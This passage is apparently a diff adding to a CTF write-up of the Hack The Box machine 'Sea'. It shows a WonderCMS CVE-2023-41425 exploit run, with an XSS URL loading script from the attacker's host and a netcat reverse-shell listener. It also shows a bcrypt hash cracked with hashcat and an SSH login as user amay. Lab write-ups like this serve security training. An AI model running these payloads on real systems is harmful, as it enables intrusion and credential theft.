--- a/_posts/1337-01-01-Sea.md
+++ b/_posts/1337-01-01-Sea.md
@@ -128,3 +128,110 @@ by Ben "epi" Risher 🤓                 ver: 2.11.0
 [####################] - 4m     30000/30000   130/s   http://sea.htb/themes/bike/css/ 
 ```
 oh we got `/version`,`/summary`,`/license`and `css/`, Let's check them all
+![alt text](../pics/image-5%20copy.png)
+Lets google really quickly what is 
+`turboblack`
+![alt text](../pics/image-6.png)
+Okay the site is running cms called `wondercms`
+Now We can do something like this 
+![alt text](../pics/image-7.png)
+Keep in mind the version we got is `3.2.0`
+Then we found this script 
+![alt text](../pics/image-8.png)
+Lets git clone it and use it 
+```bash
+┌──(kareem㉿Kali)-[~/sea/CVE-2023-41425-wonderCMS_RCE]
+└─$ python CVE-2023-41425.py -rhost http://sea.htb/loginURL -lhost 10.10.14.18 -lport 4444 -sport 8000
+[+] Set up a nc listener: nc -lnvp 4444
+[+] Send the xss URL to the victim: 
+http://sea.htb/loginURL/index.php?page=loginURL?"></form><script+src="http://10.10.14.18:8000/xss.js"></script><form+action="
+[+] Serving at http://10.10.14.18:8000
+```
+lets send this link the contact form we saw early on at `contact.php`
+![alt text](../pics/image-9.png)
+then we got this 
+![alt text](../pics/image-10.png)
+which is mean we got RCE lets mess with the shell we got 
+![alt text](../pics/image-11.png)
+okay we can read the flag let's try to gather some other informations, Lets check the website files 
+```json
+www-data@sea:/var/www/sea/data$ cat database.js
+cat database.js
+{
+    "config": {
+        "siteTitle": "Sea",
+        "theme": "bike",
+        "defaultPage": "home",
+        "login": "loginURL",
+        "forceLogout": false,
+        "forceHttps": false,
+        "saveChangesPopup": false,
+        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
+        "lastLogins": {
+            "2025\/06\/17 03:19:58": "127.0.0.1",
+            "2024\/07\/31 15:17:10": "127.0.0.1",
+            "2024\/07\/31 15:15:10": "127.0.0.1",
+            "2024\/07\/31 15:14:10": "127.0.0.1"
+        },
+        "lastModulesSync": "2025\/06\/17",
+        "customModules": {
+            "themes": {},
+            "plugins": {}
+        },
+        "menuItems": {
+            "0": {
+                "name": "Home",
+                "slug": "home",
+                "visibility": "show",
+                "subpages": {}
+            },
+            "1": {
+                "name": "How to participate",
+                "slug": "how-to-participate",
+                "visibility": "show",
+                "subpages": {}
+            }
+```
+we got this password :
+`$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q`
+this is bcrypt hash lets try to break it using hashcat
+![alt text](../pics/image-12.png)
+```bash
+$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
+                                                          
+Session..........: hashcat
+Status...........: Cracked
+Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
+Hash.Target......: $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM...DnXm4q
+Time.Started.....: Tue Jun 17 06:34:26 2025 (20 secs)
+Time.Estimated...: Tue Jun 17 06:34:46 2025 (0 secs)
+Kernel.Feature...: Pure Kernel
+Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
+Guess.Queue......: 1/1 (100.00%)
+Speed.#1.........:      171 H/s (5.89ms) @ Accel:12 Loops:8 Thr:1 Vec:1
+Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
+Progress.........: 3168/14344385 (0.02%)
+Rejected.........: 0/3168 (0.00%)
+Restore.Point....: 3024/14344385 (0.02%)
+Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
+Candidate.Engine.: Device Generator
+Candidates.#1....: iamcool -> heaven1
+Hardware.Mon.#1..: Util: 80%
+
+Started: Tue Jun 17 06:34:21 2025
+Stopped: Tue Jun 17 06:34:47 2025
+```
+and we break it now we need to find a user who is using this password to login with his creds
+Let's try to login using `geo` as username and try to login using `amay`
+```bash
+┌──(kareem㉿Kali)-[~/sea/CVE-2023-41425-wonderCMS_RCE]
+└─$ ssh amay@sea.htb      
+The authenticity of host 'sea.htb (10.10.11.28)' can't be established.
+ED25519 key fingerprint is SHA256:xC5wFVdcixOCmr5pOw8Tm4AajGSMT3j5Q4wL6/ZQg7A.
+This key is not known by any other names.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added 'sea.htb' (ED25519) to the list of known hosts.
+amay@sea.htb's password: 
+Last login: Mon Aug  5 07:16:49 2024 from 10.10.14.40
+```
+we are in babyyy now i think we got the user flag let's try to get root
